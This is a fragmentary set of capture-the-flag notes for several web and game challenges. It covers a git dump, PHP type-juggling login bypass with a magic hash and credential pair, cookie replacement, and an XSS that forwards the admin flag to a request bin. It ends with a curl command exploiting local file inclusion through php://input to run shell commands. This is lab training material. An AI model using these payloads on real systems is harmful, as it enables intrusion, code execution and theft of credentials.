Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
/.git exists, use gitdumper to get source Type juggling, password is sha256'd and compared with == Revert to get old user creds from git 34250003024812 is a magic sha256 string Andon1956:34250003024812
Saves cookie with dict of liked moments
Replace cookie and go to vip area
Can perform XSS by reporting to admin Admin dashboard has a link to /admin_flag Requesting admin_flag from a page with {, ", ', `, or gives an error
Takes the flag and forwards it to a request bin
Unity webgl game, requires adding the Cetus Chrome Extension Use cetus to search (f32) for current health, narrow down results and freeze in place Increase attack damage to 5000 When placed behind a wall, use either 0x01a508b8
, 0x01a5ab60
, 0x01fc6560
or 0x01fc65b0
to move yourself out
Basic LFI Vuln curl -XPOST 'https://file_viewer.tjctf.org/reader.php?file=php://input' -d '<?php system("whoami"); ?>' - www-data ls -la: